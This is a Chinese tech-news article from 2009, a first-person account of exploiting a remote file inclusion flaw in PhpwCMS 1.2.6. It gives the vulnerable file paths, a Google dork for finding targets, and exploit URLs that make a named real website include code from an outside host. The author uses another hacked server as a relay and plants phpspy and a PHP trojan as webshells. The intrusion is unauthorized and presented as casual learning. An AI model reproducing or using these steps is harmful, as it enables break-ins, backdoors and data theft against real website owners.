黑客如何利用文件包含漏洞进行网站入侵

ZDNet软件频道 时间:2009-11-04 作者: | 比特网 我要评论()
本文关键词:漏洞攻击 网站入侵 黑客 Windows
最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:

  一、看见漏洞公告

  最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php

  include/inc_ext/spaw/dialogs/a.php

  include/inc_ext/spaw/dialogs/colorpicker.php

  include/inc_ext/spaw/dialogs/confirm.php

  include/inc_ext/spaw/dialogs/img.php

  include/inc_ext/spaw/dialogs/img_library.php

  include/inc_ext/spaw/dialogs/td.php

  文件中的$spaw_root的没有过滤的情况下,包含"**class/lang.class.php"。具体的代码公告中没给出来。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的网站,website2是攻击的网站,website2所在的目录下有class/lang.class.php文件。

  二、学习的第一天

  马上行动,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多项结果,基本上都是国外的。看来这次发了,这次国外的wenshell肯定是一大堆了。呵呵……,嘿嘿……随便点击一个网站,是美国的:http://arena-sv.jans-webdesign.com,不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测,当然http://www.baidu.com/class/lang.class.php是不存在的,这时页面显示如图一所示,提示没有找到页面。这表明了这个网站存在文件包含漏洞,象这样的有漏洞的网站随便点击一个就是。

  检测出有文件包含漏洞

  现在开始利用这个漏洞,在我的支持asp网站根目录建一个class的目录,在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候,提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell,浏览的时候还是出现找不到文件的问题。

  郁闷啊……如果能建一个txt文件代替class/lang.class.php 多好啊。我问了我们工作组的学linux的同学,他们说可以用问号优化。但是偶不会啊,听上去很复杂的,等明天再来做吧,休息,休息。

  -------------------------------分页栏-------------------------------

  三、学习的第二天

  去搜索的发现有漏洞的网站变得比较少了,大部分的网站都被漏洞补了,还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉,还有机会学习。我在无意中得到了jsp的wenshell,试着写了一个php文件,在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。

  在webshell里面建一个class的文件夹,然后在class目录里面上传一个lang.class.php空文件,在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=%2Fopt%2Foracle%2Fproduct%2F10gbi%2Fj2ee%2Fgate%2Fapplications%2Fgate%2Fgate%2Fgate%2F,%2F是/的意思。

  php环境信息

  编辑lang.class.php的文件,先写了一个phpspy。但是登陆webshell的后,页面转到其他的页面。还是先传一可以上传的文件的马儿吧,传了一个国外的php木马,木马的功能很的大,浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=%2Fopt%2Foracle%2Fproduct%2F10gbi%2Fj2ee%2Fgate%2Fapplications%2Fgate%2Fgate%2Fgate%2F。

  包含的国外php木马

  但是这个国外的php马还是上传一个经过修改的phpspy吧,用着舒服一点,上传得文件改为了imge.php,现在访问http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陆后一台webshell就在我们的眼前了。权限也不错,但是由于是linux系统,也不知道怎么去提权,还是再放一下吧!

  phpspy上传成功

  四、学习的第三天

  对linux下的提权一点都不了解,没办法只有寻求帮助了。Jinsdb师兄叫我去一些好的网站找一下exp看看,他还告诉我了上次在我的网站中的php文件浏览的时候是找不到文件的原因:因为我的系统是2003的,所以要在IIS的ISAPI 筛选器中加.php后缀,在xp下访问php文件直接就可以浏览。看来上次我得到的服务器基本上是2003的。

  看来这次的学习也蛮有意义的!发现一点,国外的网站的管理人员比较重视安全。在出现漏洞的第二天,很多网站都把漏洞补了,还有的网站被入侵后能马上发现,并及时清除了webshell。

漏洞攻击

网站入侵

黑客

Windows

用户评论
用户名
评论内容
发表时间
ZDNet网友
2011-03-18 14:57:01
ZDNet网友
2010-05-21 00:49:14
ZDNet网友
2010-05-21 00:48:00
ZDNet网友
微软应该对自己的用户负责,如果用户完全使用xp升级微软win7,为什么要付出这样麻烦的代价?都是微软出品软件,且都是利用该软件获取信息以及处理文字、多媒体功能,微软应该尽可能方便用户!虽然有时候这样的请求也许跟不上时代技术发展的脚步,但是微软不要以此为借口,认为一切都理所应当,就不可以方便用户。还是要尽力,所谓拿人手短吃人嘴软,商业不正是讲求有商道吗!至少做人需诚实守信,尽可能帮助用户顺利、安全转换操作系统、各种必须软件功能尽可能兼容以及信息尽可能的少丢失!虽然这很大程度仅仅取决于微软等计算机专家、工程师的自我自律约束,我们普通用户恐怕很难知道微软究竟仅了多大力量为用户考虑,但是我相信真相会有被发现的一天,无论多久远。 微软从某种意义上来说,就是一个类似“掌握魔方”操作特别出神入化的公司。几乎奠定了电脑主要的“规则”,但是,我却相信不久将来我们会发现,电脑依然是非常有限的一个小系统而已!随着我们新的关键材料认知突破,电脑系统会真正被另一个革命性新电脑系统所取代,不要以为我这样的说法是无稽之谈不可实现,我却认为很有可能,只看这样的情况发生究竟是快还是慢,是早还是迟!变成历史的小玩具之后的电脑系统,微软会留下良好的历史声名吗?我们拭目以待! 网友::我爱佛祖
2010-02-03 13:52:55
- 发表评论 -
匿名
注册用户

百度大联盟认证黄金会员Copyright© 1997- CNET Networks 版权所有。 ZDNet 是CNET Networks公司注册服务商标。
中华人民共和国电信与信息服务业务经营许可证编号:京ICP证010391号 京ICP备09041801号-159
京公网安备:1101082134